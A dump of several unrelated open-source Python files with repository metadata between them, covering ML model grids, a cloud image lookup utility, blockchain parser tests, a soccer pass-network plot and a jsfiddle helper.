[5, 7, 9, 11, 13], # "min_samples_split": [2], # 'max_features': ['sqrt', 0.25, 0.5, 0.75, 1.0], # "class_weight": [None]}), # 'rf': (RandomForestClassifier(), # {'n_estimators': [200, 500, 1000], # 'max_depth': [4, 6, 8, 10], # "min_samples_split": [2, 10], # 'max_features': [0.25, 0.5], # "class_weight": [None]}), 'rf': (RandomForestClassifier(), {'n_estimators': [800], 'max_depth': [8], "min_samples_split": [10], 'max_features': [0.25], "class_weight": [None]}), # 'rf': (RandomForestClassifier(), # {'n_estimators': [400, 500, 600], # 'max_depth': [7,8,9], # "min_samples_split": [5,10], # 'max_features': [0.25, 0.5, ]}), # 'rf': (RandomForestClassifier(), # {}), 'xgb': (xgb.XGBClassifier(), {}), # 'rf': (RandomForestClassifier(), # {'n_estimators': [600], # 'max_depth': [9], # "min_samples_split": [10], # 'max_features': [0.25]}), # # 'xgb': (xgb.XGBClassifier(), # {'n_estimators': [100,500], # 'max_depth': [3,4,5], # 'learning_rate': [0.1, 0.3], # "reg_alpha": [0, 1], # "reg_lambda": [0.1, 1]}), # 'xgb': (xgb.XGBClassifier(), # {'n_estimators': [500], # 'max_depth': [4], # 'learning_rate': [0.1], # "reg_alpha": [0, 10], # "reg_lambda": [0.1, 10]}), # 'gbm': (GradientBoostingClassifier(), # {'n_estimators': [200, 300], # 'learning_rate': [0.01], # 'max_depth': [3,4,5], # 'subsample': [0.35, 0.7], # 'max_features': [0.25]}), # 'gbm': (GradientBoostingClassifier(), # {'n_estimators': [400], # 'learning_rate': [0.01], # 'max_depth': [5], # 'subsample': [0.75], # 'max_features': [0.25]}), # 'gbm': (GradientBoostingClassifier(), # {'n_estimators': [300, 400, 500], # 'learning_rate': [0.01, 0.003, 0.4], # 'max_depth': [5, 6, 7], # 'subsample': [0.85, 1], # 'max_features': [0.25, 0.5]}), 'gbm': (GradientBoostingClassifier(), {}), # 'gbm': (GradientBoostingClassifier(), # {'n_estimators': [100, 200, 300, 500, 1000, 2000, # 4000], # 'max_depth': [2, 3, 4, 5, 6, 7, # 9], # 'subsample': [0.75, # 1], # 'max_features': ['sqrt', 'log2', 0.25, 0.5, 0.75, # 1.0]}), # 'gbm': (GradientBoostingClassifier(), # {'n_estimators': [100, 200, 400, 800], # 'learning_rate': [0.03, 0.01, 0.001], # 'max_depth': [4,5,6,8], # 'subsample': [0.85], # 'max_features': [0.25, 0.5]}), # 'gbm': (GradientBoostingClassifier(), # {'n_estimators': [400, 600], # 'learning_rate': [0.01], # 'max_depth': [5, 6], # 'subsample': [0.85], # 'max_features': [0.25]}), # 'gbm': (GradientBoostingClassifier(), # {'n_estimators': [25, 50, 75, 100, 200], # 'max_depth': [2,3,5], # 'subsample': [0.25, 0.5, 0.75, 1], # 'max_features': [None, 'sqrt', 'log2', 0.5]}), } return(models_and_parameters) def load_models_and_parameters(): models_and_parameters = { 'dummy_reg': (DummyRegressor(), {"strategy": ["mean"]}), 'lasso_reg': (linear_model.Lasso(), {'alpha': np.arange(0.1, 1.0, 0.01), 'max_iter': [10000]}), 'rf_reg': (RandomForestRegressor(), {'n_estimators': [501], 'criterion': ['mae'], 'max_depth': [3, 5, 10], 'max_features': ['auto', 'sqrt', 'log2']}), 'gbm_reg': (GradientBoostingRegressor(), {'n_estimators': [501], 'criterion': ['mae'], # 'loss': ['ls', 'lad'], 'max_depth': [3, 5, 10], 'max_features': ['auto', 'sqrt', 'log2']}), 'dummy': (DummyClassifier(), {"strategy": ["most_frequent"]}), # 'logreg': (LogisticRegression(), # {"class_weight": [None], # "C":[0.1, 0.3, 1,5, 10]}), #, "balanced" 'logreg': (LogisticRegression(), {"class_weight": [None], "C":[0.01,0.1, 1]}), #, "balanced" # "C":[0.1]}), #, "balanced" # 'logreg': (LogisticRegression(), # {}), #, "balanced" # # "C":[0.1]}), #, "balanced" 'lasso': (Lasso(), {"alpha": [0.0001, 0.001],#np.arange(0.01, 1.01, 0.05), 'max_iter': [10000]}), 'lasso2': (LogisticRegression(penalty = 'l1', solver ='saga'), {"C":[0.001, 0.01,0.1, 1]}), # 'lasso2': (LogisticRegression(penalty = 'l1'), # {}), 'elnet': (LogisticRegression(penalty = 'elasticnet', solver = 'saga'), {"C":[0.001, 0.01,0.1, 1], "l1_ratio":[0.01, 0.1, 0.5, 0.9, 0.99]}), 'dt': (DecisionTreeClassifier(), {"criterion": ["entropy"], # "max_depth": [2, 3, 4, 5, 10, 20], # None "max_depth": [1, 2, 3, 4], # None "splitter": ["best", "random"], "min_samples_split": [2, 5, 10], "min_samples_leaf": [3, 5, 10, 15, 20], "random_state": [817263]}), 'svm': (SVC(), {'C': [ 1], 'kernel': ['linear']}), #'poly', 'rbf' 'knn': (KNeighborsClassifier(), {'n_neighbors': [2, 3, 5, 10, 20, 50], 'weights': ['uniform', 'distance']}), # 'rf': (RandomForestClassifier(), # {'n_estimators': [501], # 'max_depth': [3, 5, 10], # 'max_features': ['auto', 'sqrt', 'log2']}), # 'rf': (RandomForestClassifier(), # {'n_estimators': [50, 100, 501, 1000], # 'max_depth': [3,5,7], # "min_samples_split": [2, 5], # 'max_features': ['auto', 0.5], # "class_weight": [None, "balanced"]}), # 'rf': (RandomForestClassifier(), # {'n_estimators': [501], # 'max_depth': [5], # "min_samples_split": [5], # 'max_features': ['auto'], # "class_weight": [None]}), # 'rf': (RandomForestClassifier(), # {'n_estimators': [ 501, 1000, 2000, 4000], # 'max_depth': [5, 7, 9, 11, 13], # "min_samples_split": [2], # 'max_features': ['sqrt', 0.25, 0.5, 0.75, 1.0], # "class_weight": [None]}), # 'rf': (RandomForestClassifier(), # {'n_estimators': [200, 500, 1000], # 'max_depth': [4, 6, 8, 10], # "min_samples_split": [2, 10], # 'max_features': [0.25, 0.5], # "class_weight": [None]}), 'rf': (RandomForestClassifier(), {'n_estimators': [500, 1000], 'max_depth': [8], "min_samples_split": [10], 'max_features': [0.25], "class_weight": [None]}), # 'rf': (RandomForestClassifier(), # {'n_estimators': [400, 500, 600], # 'max_depth': [7,8,9], # "min_samples_split": [5,10], # 'max_features': [0.25, 0.5, ]}), # 'rf': (RandomForestClassifier(), # {}), # 'xgb': (xgb.XGBClassifier(), # {}), # 'rf': (RandomForestClassifier(), # {'n_estimators': [600], # 'max_depth': [9], # "min_samples_split": [10], # 'max_features': [0.25]}), # # 'xgb': (xgb.XGBClassifier(), # {'n_estimators': [100,500], # 'max_depth': [3,4,5], # 'learning_rate': [0.1, 0.3], # "reg_alpha": [0, 1], # "reg_lambda": [0.1, 1]}), # 'xgb': (xgb.XGBClassifier(), # {'n_estimators': [500], # 'max_depth': [4], # 'learning_rate': [0.1], # "reg_alpha": [0, 10], # "reg_lambda": [0.1, 10]}), # 'gbm': (GradientBoostingClassifier(), # {'n_estimators': [200, 300], # 'learning_rate': [0.01], # 'max_depth': [3,4,5], # 'subsample': [0.35, 0.7], # 'max_features': [0.25]}), # 'gbm': (GradientBoostingClassifier(), # {'n_estimators': [400], # 'learning_rate': [0.01], # 'max_depth': [5], # 'subsample': [0.75], # 'max_features': [0.25]}), # 'gbm': (GradientBoostingClassifier(), # {'n_estimators': [300, 400, 500], # 'learning_rate': [0.01, 0.003, 0.4], # 'max_depth': [5, 6, 7], # 'subsample': [0.85, 1], # 'max_features': [0.25, 0.5]}), # 'gbm': (GradientBoostingClassifier(), # {}), # 'gbm': (GradientBoostingClassifier(), # {'n_estimators': [100, 200, 300, 500, 1000, 2000, # 4000], # 'max_depth': [2, 3, 4, 5, 6, 7, # 9], # 'subsample': [0.75, # 1], # 'max_features': ['sqrt', 'log2', 0.25, 0.5, 0.75, # 1.0]}), 'gbm': (GradientBoostingClassifier(), {'n_estimators': [100, 200, 400, 800], 'learning_rate': [0.03, 0.01, 0.001], 'max_depth': [4,5,6,8], 'subsample': [0.85], 'max_features': [0.25, 0.5]}), # 'gbm': (GradientBoostingClassifier(), # {'n_estimators': [400, 600], # 'learning_rate': [0.01], # 'max_depth': [5, 6], # 'subsample': [0.85], # 'max_features': [0.25]}), # 'gbm': (GradientBoostingClassifier(), # {'n_estimators': [25, 50, 75, 100, 200], # 'max_depth': [2,3,5], # 'subsample': [0.25, 0.5, 0.75, 1], # 'max_features': [None, 'sqrt', 'log2', 0.5]}), } return(models_and_parameters) def calc_metrics(y_true, y_pred, return_all = False): res_df = pd.DataFrame({'y_true' : y_true, 'y_pred': y_pred}, columns = ['y_pred', 'y_true']) res_df = res_df.sort_values(by = 'y_pred') res_df['TN'] = (res_df.y_true == 0).cumsum() res_df['FN'] = (res_df.y_true == 1).cumsum() if return_all == False: res_df = pd.concat([pd.DataFrame({'y_true' : -1, 'y_pred': -1, "TN": 0, "FN":0}, index = [-1], columns = ['y_pred', 'y_true', 'TN', "FN"]), res_df], axis = 0) res_df['TP'] = (res_df.y_true == 1).sum() - res_df['FN'] res_df['FP'] = (res_df.y_true == 0).sum() - res_df['TN'] res_df['sens'] = res_df.TP / (res_df.TP + res_df.FN) res_df['spec'] = res_df.TN / (res_df.TN + res_df.FP) res_df['PPV'] = res_df.TP / (res_df.TP + res_df.FP) res_df['accuracy'] = (res_df.TP + res_df.TN) / (res_df.shape[0]) res_df['f1_score'] = 2 * res_df.PPV * res_df.sens / (res_df.PPV + res_df.sens) res_df['youdens_index'] = res_df.sens + res_df.spec - 1 # remove predictions which represent non-separable decision points (i.e., y_pred is equal) if return_all == False: res_df = res_df[(res_df.y_pred.duplicated('last') == False)] return(res_df) def set_up_plot(): # plt.grid(True, 'major', color = 'w', linewidth = 0.7) plt.grid(True, 'major', color = '0.85', linewidth = 0.7) plt.grid(True, 'minor', color = "0.92", linestyle = '-', linewidth = 0.7) ax = plt.gca() plt.xlim([-0.05, 1.05]) plt.ylim([-0.05, 1.05]) ax.set_axisbelow(True) # ax.patch.set_facecolor("0.85") def train_val(RESULT_DIR, alldata, models, label = 'Label', cv = 5, score_name = "AUC", to_exclude = None, test_ind_col = None, oversample_rate = 1, imputer = 'iterative', add_missing_flags = True): from medical_ML import Experiment print('\n\n' + 'STARTING EXPERIMENT FOR ' + RESULT_DIR + '\n\n') expt = Experiment(alldata, label = label, to_exclude = to_exclude, test_ind_col = test_ind_col, drop = 'all', result_dir = RESULT_DIR) expt.predict_models_from_groups(0, models, cv=cv, score_name=score_name, mode='classification', oversample_rate = oversample_rate, imputer = imputer, add_missing_flags = add_missing_flags) expt.save_and_plot_results(models, cv = cv, test = False) return(expt)
48.821121
147
0.382201
0
0
0
0
0
0
0
0
12,622
0.557189
4c656802f3785c807e752895a2d07dd94b79c82b
4,377
py
Python
cloud/caasp-admin-setup/lib/caaspadminsetup/utils.py
hwoarang/caasp-container-manifests
6df831d6b4f4218f96e552c416d86eabcfad46c0
[ "Apache-2.0" ]
5
2017-03-16T10:47:39.000Z
2018-01-17T13:07:03.000Z
cloud/caasp-admin-setup/lib/caaspadminsetup/utils.py
hwoarang/caasp-container-manifests
6df831d6b4f4218f96e552c416d86eabcfad46c0
[ "Apache-2.0" ]
138
2017-03-08T12:43:51.000Z
2019-04-15T12:57:30.000Z
cloud/caasp-admin-setup/lib/caaspadminsetup/utils.py
hwoarang/caasp-container-manifests
6df831d6b4f4218f96e552c416d86eabcfad46c0
[ "Apache-2.0" ]
26
2017-03-09T08:24:03.000Z
2019-03-08T00:26:52.000Z
import json import logging import re import susepubliccloudinfoclient.infoserverrequests as ifsrequest import yaml import sys RELEASE_DATE = re.compile('^.*-v(\d{8})-*.*') def get_caasp_release_version(): """Return the version from os-release""" os_release = open('/etc/os-release', 'r').readlines() for entry in os_release: if entry.startswith('VERSION_ID'): version_id = entry.split('=')[-1].strip() # We assume that os-release will always have '"' as # version delimiters version = version_id.strip('"\'') logging.info('Release version: "%s"' % version) return version def get_cloud_config_path(): """Return the path for the cloud configuration file""" return '/etc/salt/pillar/cloud.sls' def get_from_config(config_option): """Get the value for the given config option""" # Expected low usage of this method, re-read the file on an as needed # basis. If this turns out to be an issue cache the content config_path = get_cloud_config_path() with open(config_path) as config_file: config = yaml.load(config_file.read()) settings = config.get('cloud') if not settings: return return settings.get(config_option) def get_cluster_image_identifier(framework, region): """Return the identifier for the latest cluster node image""" cluster_image = get_from_config('cluster_image') if cluster_image: # The data returned in this code path has built in knowledge # about the information consumed by the client from the # full pint data image_data = {} image_data['id'] = cluster_image image_data['name'] = cluster_image if framework == 'microsoft' and cluster_image.count(':') == 3: image_data['urn'] = cluster_image msg = 'Using cluster image from configuration. ' msg += 'Image data for cluster node image: "%s"' logging.info(msg % image_data) return image_data name_filter = 'name~caasp,name~cluster' flavor = get_from_config('procurement_flavor') if flavor == 'byos': name_filter += ',name~byos' else: name_filter += ',name!byos' version = get_caasp_release_version() name_filter += ',name~' + version.replace('.', '-') # The cluster image we choose depends on the admin node version, # thus we cannot just query for active images. We need to get all # images and then process accordingly. try: image_info = ifsrequest.get_image_data( framework, None, 'json', region, name_filter ) except Exception as e: logging.error('Pint server access failed: "%s"' % e.message) # This message will bubble up through salt return 'See /var/log/caasp_cloud_setup.log' try: image_data = json.loads(image_info) available_images = image_data.get('images', []) target_image = None target_image_date = 0 for image in available_images: image_name = image.get('name') try: date = int(RELEASE_DATE.match(image_name).group(1)) if date > target_image_date: # If we have multiple images with the same date that # match our filter criteria we have a serious data problem # we cannot really recover, the first one wins target_image = image except Exception: # Image name with no date stamp skip it continue except Exception as e: logging.error('Could not load json data from pint: "%s"' % e.message) # This message will bubble up through salt return 'See /var/log/caasp_cloud_setup.log' if not target_image: logging.error('Could not determine image identifier for cluster node.') logging.error('This implies that the pint server is unreachable or the ' 'data is incomplete, please report the issue, exiting.') sys.exit('pint lookup failed') logging.info('Image data for cluster node image: "%s"' % target_image) return target_image def load_platform_module(platform_name): mod = __import__('caaspadminsetup.%s' % platform_name, fromlist=['']) return mod
37.732759
80
0.631026
0
0
0
0
0
0
0
0
1,729
0.395019
4c66a4345821de6dcbba5bb0bbb633c3ee79daa3
2,219
py
Python
tools/Bitcoin Parser/blockchain_parser/tests/test_block.py
simewu/bitcoin_researcher
b9fd2efdb8ae8467c5bd4b3320713a541635df16
[ "MIT" ]
1
2020-02-15T21:44:04.000Z
2020-02-15T21:44:04.000Z
tools/Bitcoin Parser/blockchain_parser/tests/test_block.py
SimeoW/bitcoin
3644405f06c8b16a437513e8c02f0f061b91be2e
[ "MIT" ]
null
null
null
tools/Bitcoin Parser/blockchain_parser/tests/test_block.py
SimeoW/bitcoin
3644405f06c8b16a437513e8c02f0f061b91be2e
[ "MIT" ]
null
null
null
# Copyright (C) 2015-2016 The bitcoin-blockchain-parser developers # # This file is part of bitcoin-blockchain-parser. # # It is subject to the license terms in the LICENSE file found in the top-level # directory of this distribution. # # No part of bitcoin-blockchain-parser, including this file, may be copied, # modified, propagated, or distributed except according to the terms contained # in the LICENSE file. import unittest from datetime import datetime from .utils import read_test_data from blockchain_parser.block import Block class TestBlock(unittest.TestCase): def test_from_hex(self): block_hex = read_test_data("genesis_block.txt") block = Block.from_hex(block_hex) self.assertEqual(1, block.n_transactions) block_hash = "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1" \ "b60a8ce26f" self.assertEqual(block_hash, block.hash) self.assertEqual(486604799, block.header.bits) merkle_root = "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127" \ "b7afdeda33b" self.assertEqual(merkle_root, block.header.merkle_root) self.assertEqual(2083236893, block.header.nonce) self.assertEqual(1, block.header.version) self.assertEqual(1, block.header.difficulty) self.assertEqual(285, block.size) self.assertEqual(datetime.utcfromtimestamp(1231006505), block.header.timestamp) self.assertEqual("0" * 64, block.header.previous_block_hash) for tx in block.transactions: self.assertEqual(1, tx.version) tx_hash = "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127" \ "b7afdeda33b" self.assertEqual(tx_hash, tx.hash) self.assertEqual(204, tx.size) self.assertEqual(0, tx.locktime) self.assertEqual(0xffffffff, tx.inputs[0].transaction_index) self.assertEqual(0xffffffff, tx.inputs[0].sequence_number) self.assertTrue("ffff001d" in tx.inputs[0].script.value) self.assertEqual("0" * 64, tx.inputs[0].transaction_hash) self.assertEqual(50 * 100000000, tx.outputs[0].value)
43.509804
79
0.68995
1,677
0.755746
0
0
0
0
0
0
644
0.290221
4c66dd7c5bb758efe86e3099648aa0be4405bfa6
75
py
Python
genegenie/admin/__init__.py
genegeniebio/genegenie-admin
93e9253febc14b17d17a5fbc2eb0e22f1c974083
[ "MIT" ]
null
null
null
genegenie/admin/__init__.py
genegeniebio/genegenie-admin
93e9253febc14b17d17a5fbc2eb0e22f1c974083
[ "MIT" ]
null
null
null
genegenie/admin/__init__.py
genegeniebio/genegenie-admin
93e9253febc14b17d17a5fbc2eb0e22f1c974083
[ "MIT" ]
null
null
null
''' DNA++ (c) DNA++ 2017 All rights reserved. @author: neilswainston '''
9.375
22
0.626667
0
0
0
0
0
0
0
0
74
0.986667
4c69488448856c1dbc829f26d69379083cb5c7c7
600
py
Python
tests/conftest.py
pkavousi/similar-users
8434e0a03dc8dfa218a34601431c564dff3e80b6
[ "FTL", "RSA-MD" ]
null
null
null
tests/conftest.py
pkavousi/similar-users
8434e0a03dc8dfa218a34601431c564dff3e80b6
[ "FTL", "RSA-MD" ]
null
null
null
tests/conftest.py
pkavousi/similar-users
8434e0a03dc8dfa218a34601431c564dff3e80b6
[ "FTL", "RSA-MD" ]
null
null
null
import os import pandas as pd import pytest from user_similarity_model.config.core import DATASET_DIR, config @pytest.fixture() def sample_local_data(): """AI is creating summary for sample_local_data Returns: [Dict]: This function returns a dictionary with CSV files which in dataset folder. The data will be compared in tests against data that are pulled from Azure PostgreSQL server. """ sample_data = {} for file in config.app_config.csv_files: sample_data[file[0:-4]] = pd.read_csv(os.path.join(DATASET_DIR, file)) return sample_data
27.272727
78
0.716667
0
0
0
0
485
0.808333
0
0
270
0.45
4c6a6e28161a83ca0b9ef2212d453c1bc1cfcfd6
232
py
Python
weather/apps.py
chrisjen83/rfb_weather_obs
8eab16358c5059655d208ef41aa38692fa21776f
[ "Apache-2.0" ]
1
2020-12-05T05:23:26.000Z
2020-12-05T05:23:26.000Z
weather/apps.py
chrisjen83/rfb_weather_obs
8eab16358c5059655d208ef41aa38692fa21776f
[ "Apache-2.0" ]
null
null
null
weather/apps.py
chrisjen83/rfb_weather_obs
8eab16358c5059655d208ef41aa38692fa21776f
[ "Apache-2.0" ]
null
null
null
from django.apps import AppConfig import logging logger = logging.getLogger(__name__) class WeatherConfig(AppConfig): name = 'weather' def ready(self): from forecastUpdater import updater updater.start()
17.846154
43
0.715517
142
0.612069
0
0
0
0
0
0
9
0.038793
4c6a77a19021a586afe308be8abcbb50f2c090fd
26
py
Python
projects/django-filer/test.py
fleimgruber/python
2e735762c73651cffc027ca850b2a58d87d54b49
[ "Unlicense" ]
25
2021-10-30T19:54:59.000Z
2022-03-29T06:11:02.000Z
projects/django-filer/test.py
fleimgruber/python
2e735762c73651cffc027ca850b2a58d87d54b49
[ "Unlicense" ]
21
2021-10-19T01:09:38.000Z
2022-03-24T16:08:53.000Z
projects/django-filer/test.py
fleimgruber/python
2e735762c73651cffc027ca850b2a58d87d54b49
[ "Unlicense" ]
3
2022-01-25T20:25:13.000Z
2022-03-08T02:58:50.000Z
import filer import tests
8.666667
12
0.846154
0
0
0
0
0
0
0
0
0
0
4c6c5b767e3d2e7d380bed49701614a213de873b
8,063
py
Python
examples/plots/plot_pass_network.py
DymondFormation/mplsoccer
544300857ec5936781e12fda203cf2df8a3d00b9
[ "MIT" ]
null
null
null
examples/plots/plot_pass_network.py
DymondFormation/mplsoccer
544300857ec5936781e12fda203cf2df8a3d00b9
[ "MIT" ]
null
null
null
examples/plots/plot_pass_network.py
DymondFormation/mplsoccer
544300857ec5936781e12fda203cf2df8a3d00b9
[ "MIT" ]
null
null
null
""" ============ Pass Network ============ This example shows how to plot passes between players in a set formation. """ import pandas as pd from mplsoccer.pitch import Pitch from matplotlib.colors import to_rgba import numpy as np from mplsoccer.statsbomb import read_event, EVENT_SLUG ############################################################################## # Set team and match info, and get event and tactics dataframes for the defined match_id match_id = 15946 team = 'Barcelona' opponent = 'Alavés (A), 2018/19 La Liga' event_dict = read_event(f'{EVENT_SLUG}/{match_id}.json', warn=False) players = event_dict['tactics_lineup'] events = event_dict['event'] ############################################################################## # Adding on the last tactics id and formation for the team for each event events.loc[events.tactics_formation.notnull(), 'tactics_id'] = events.loc[ events.tactics_formation.notnull(), 'id'] events[['tactics_id', 'tactics_formation']] = events.groupby('team_name')[[ 'tactics_id', 'tactics_formation']].ffill() ############################################################################## # Add the abbreviated player position to the players dataframe formation_dict = {1: 'GK', 2: 'RB', 3: 'RCB', 4: 'CB', 5: 'LCB', 6: 'LB', 7: 'RWB', 8: 'LWB', 9: 'RDM', 10: 'CDM', 11: 'LDM', 12: 'RM', 13: 'RCM', 14: 'CM', 15: 'LCM', 16: 'LM', 17: 'RW', 18: 'RAM', 19: 'CAM', 20: 'LAM', 21: 'LW', 22: 'RCF', 23: 'ST', 24: 'LCF', 25: 'SS'} players['position_abbreviation'] = players.player_position_id.map(formation_dict) ############################################################################## # Add on the subsitutions to the players dataframe, i.e. where players are subbed on # but the formation doesn't change sub = events.loc[events.type_name == 'Substitution', ['tactics_id', 'player_id', 'substitution_replacement_id', 'substitution_replacement_name']] players_sub = players.merge(sub.rename({'tactics_id': 'id'}, axis='columns'), on=['id', 'player_id'], how='inner', validate='1:1') players_sub = (players_sub[['id', 'substitution_replacement_id', 'position_abbreviation']] .rename({'substitution_replacement_id': 'player_id'}, axis='columns')) players = pd.concat([players, players_sub]) players.rename({'id': 'tactics_id'}, axis='columns', inplace=True) players = players[['tactics_id', 'player_id', 'position_abbreviation']] ############################################################################## # Add player position information to the events dataframe # add on the position the player was playing in the formation to the events dataframe events = events.merge(players, on=['tactics_id', 'player_id'], how='left', validate='m:1') # add on the position the receipient was playing in the formation to the events dataframe events = events.merge(players.rename({'player_id': 'pass_recipient_id'}, axis='columns'), on=['tactics_id', 'pass_recipient_id'], how='left', validate='m:1', suffixes=['', '_receipt']) ############################################################################## # Create dataframes for passes and player locations # get a dataframe with all passes mask_pass = (events.team_name == team) & (events.type_name == 'Pass') to_keep = ['id', 'match_id', 'player_id', 'player_name', 'outcome_name', 'pass_recipient_id', 'pass_recipient_name', 'x', 'y', 'end_x', 'end_y', 'tactics_id', 'tactics_formation', 'position_abbreviation', 'position_abbreviation_receipt'] passes = events.loc[mask_pass, to_keep].copy() print('Formations used by {} in match: '.format(team), passes['tactics_formation'].unique()) ############################################################################## # Filter passes by chosen formation, then group all passes and receipts to # calculate avg x, avg y, count of events for each slot in the formation formation = 433 passes_formation = passes[(passes.tactics_formation == formation) & (passes.position_abbreviation_receipt.notnull())].copy() passer_passes = passes_formation[['position_abbreviation', 'x', 'y']].copy() recipient_passes = passes_formation[['position_abbreviation_receipt', 'end_x', 'end_y']].copy() # rename columns to match those in passer_passes recipient_passes.rename({'position_abbreviation_receipt': 'position_abbreviation', 'end_x': 'x', 'end_y': 'y'}, axis='columns', inplace=True) # create a new dataframe containing all individual passes and receipts from passes_formation appended_passes = pd.concat(objs=[passer_passes, recipient_passes], ignore_index=True) average_locs_and_count = appended_passes.groupby('position_abbreviation').agg({ 'x': ['mean'], 'y': ['mean', 'count']}) average_locs_and_count.columns = ['x', 'y', 'count'] ############################################################################## # Group the passes by unique pairings of players and add the avg player positions to this dataframe # calculate the number of passes between each position (using min/ max so we get passes both ways) passes_formation['pos_max'] = passes_formation[['position_abbreviation', 'position_abbreviation_receipt']].max(axis='columns') passes_formation['pos_min'] = passes_formation[['position_abbreviation', 'position_abbreviation_receipt']].min(axis='columns') passes_between = passes_formation.groupby(['pos_min', 'pos_max']).id.count().reset_index() passes_between.rename({'id': 'pass_count'}, axis='columns', inplace=True) # add on the location of each player so we have the start and end positions of the lines passes_between = passes_between.merge(average_locs_and_count, left_on='pos_min', right_index=True) passes_between = passes_between.merge(average_locs_and_count, left_on='pos_max', right_index=True, suffixes=['', '_end']) ############################################################################## # Calculate the line width and marker sizes relative to the largest counts max_line_width = 18 max_marker_size = 3000 passes_between['width'] = passes_between.pass_count / passes_between.pass_count.max() * max_line_width average_locs_and_count['marker_size'] = (average_locs_and_count['count'] / average_locs_and_count['count'].max() * max_marker_size) ############################################################################## # Set color to make the lines more transparent when fewer passes are made min_transparency = 0.3 color = np.array(to_rgba('white')) color = np.tile(color, (len(passes_between), 1)) c_transparency = passes_between.pass_count / passes_between.pass_count.max() c_transparency = (c_transparency * (1 - min_transparency)) + min_transparency color[:, 3] = c_transparency ############################################################################## # Plotting pitch = Pitch(pitch_type='statsbomb', orientation='horizontal', pitch_color='#22312b', line_color='#c7d5cc', figsize=(16, 11), constrained_layout=True, tight_layout=False) fig, ax = pitch.draw() pass_lines = pitch.lines(passes_between.x, passes_between.y, passes_between.x_end, passes_between.y_end, lw=passes_between.width, color=color, zorder=1, ax=ax) pass_nodes = pitch.scatter(average_locs_and_count.x, average_locs_and_count.y, s=average_locs_and_count.marker_size, color='red', edgecolors='black', linewidth=1, alpha=1, ax=ax) for index, row in average_locs_and_count.iterrows(): pitch.annotate(row.name, xy=(row.x, row.y), c='white', va='center', ha='center', size=16, weight='bold', ax=ax) title = ax.set_title("{} {} Formation vs {}".format(team, formation, opponent), size=28, y=0.97, color='#c7d5cc') fig.set_facecolor("#22312b")
55.226027
116
0.615032
0
0
0
0
0
0
0
0
3,987
0.49442
4c6cd0ca287f397e656cbb934079a5d03bb867b9
2,786
py
Python
jsfiddle_factory/__init__.py
andrewp-as-is/jsfiddle-factory.py
7b8b883676f3330f5714b15157819b583a753ba1
[ "Unlicense" ]
null
null
null
jsfiddle_factory/__init__.py
andrewp-as-is/jsfiddle-factory.py
7b8b883676f3330f5714b15157819b583a753ba1
[ "Unlicense" ]
null
null
null
jsfiddle_factory/__init__.py
andrewp-as-is/jsfiddle-factory.py
7b8b883676f3330f5714b15157819b583a753ba1
[ "Unlicense" ]
null
null
null
__all__ = ['Factory'] import jsfiddle_build import jsfiddle_github import jsfiddle_generator import jsfiddle_readme_generator import getdirs import getfiles import os import popd import yaml @popd.popd def _build(path): os.chdir(path) jsfiddle_build.Build().save("build.html") @popd.popd def _init(path): os.chdir(path) isempty = len(os.listdir(path)) == 0 isfiddle = len( list(filter(os.path.exists, ["demo.css", "demo.js", "demo.html"]))) > 0 if isempty or isfiddle: jsfiddle_generator.JSFiddleRepo().create() @popd.popd def _readme(path): os.chdir(path) jsfiddle_readme_generator.Readme().save("README.md") class Factory: """attrs: `path`. methods: `detox()`, `init()`, `build()`, `readme()`, `update_resources()`""" path = None def __init__(self, path=None): if not path: path = os.getcwd() self.path = path def build_html(self): files = getfiles.getfiles(self.path) matches = ["demo.html", "fiddle.html"] for f in filter(lambda f: os.path.basename(f) in matches, files): _build(os.path.dirname(f)) def create_readme(self): files = getfiles.getfiles(self.path) matches = ["demo.html", "fiddle.html"] for f in filter(lambda f: os.path.basename(f) in matches, files): _readme(os.path.dirname(f)) def init(self): for path in getdirs.getdirs(self.path): _init(path) def detox(self): renamed = True while renamed: renamed = False for path in getdirs.getdirs(self.path): relpath = os.path.relpath(path, os.getcwd()) new_relpath = jsfiddle_github.sanitize(relpath) new_path = os.path.join(os.getcwd(), new_relpath) ishidden = relpath[0] == "." and "%s." % os.sep not in relpath if not ishidden and new_relpath != relpath: os.rename(path, new_path) print("%s -> %s" % (path, new_path)) renamed = True break def update_resources(self): f = os.path.join(self.path, "resources.txt") if not os.path.exists(f): print("SKIP: %s NOT EXISTS" % f) resources = list(filter(None, open(f).read().splitlines())) files = getfiles.getfiles(self.path) matches = ["demo.details", "fiddle.manifest"] for f in filter(lambda f: os.path.basename(f) in matches, files): if os.path.exists(f): data = yaml.load(open(f, 'r')) if data.get("resources", []) != resources: data["resources"] = resources yaml.dump(data, open(f, 'w'), default_flow_style=False)
30.955556
98
0.578248
2,117
0.759871
0
0
464
0.166547
0
0
317
0.113783
4c6d7d5083c40236ec67c12d5db46eb9b81e4185
5,774
py
Python
spellnn/train.py
MartinXPN/SpellNN
e3226fbff359ef60360e63bf7b80a7e1c909e7d8
[ "MIT" ]
null
null
null
spellnn/train.py
MartinXPN/SpellNN
e3226fbff359ef60360e63bf7b80a7e1c909e7d8
[ "MIT" ]
null
null
null
spellnn/train.py
MartinXPN/SpellNN
e3226fbff359ef60360e63bf7b80a7e1c909e7d8
[ "MIT" ]
null
null
null
import logging import os from datetime import datetime from inspect import signature, Parameter from pathlib import Path from pprint import pprint from textwrap import dedent from typing import Optional, Union import fire import tensorflow as tf from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard, TerminateOnNaN from tensorflow.keras import Model from spellnn import models from spellnn.data import alphabet from spellnn.data.alphabet import get_chars from spellnn.data.processing import DataProcessor from spellnn.data.util import nb_lines from spellnn.layers.mapping import CharMapping os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # FATAL logging.getLogger('tensorflow').setLevel(logging.FATAL) class Gym: def __init__(self): self.train_dataset: Optional[tf.data.Dataset] = None self.valid_dataset: Optional[tf.data.Dataset] = None self.char2int: Optional[CharMapping] = None self.model: Optional[Model] = None self.nb_train_samples: int = 0 self.nb_valid_samples: int = 0 self.batch_size = 0 def construct_dataset(self, path: str, locale: str, batch_size: int = 32, validation_split: float = 0.3): pprint(locals()) all_chars = [alphabet.START, alphabet.END] + get_chars(locale) char_weights = [0.5 if c.isalpha() and c.islower() else 0.2 if c.isalpha() else 0.1 if c not in {alphabet.START, alphabet.END} else 0 for c in all_chars] self.char2int = CharMapping(chars=all_chars, include_unknown=True) data_processor = DataProcessor(locale=locale, char2id=self.char2int, alphabet=all_chars, alphabet_weighs=char_weights) 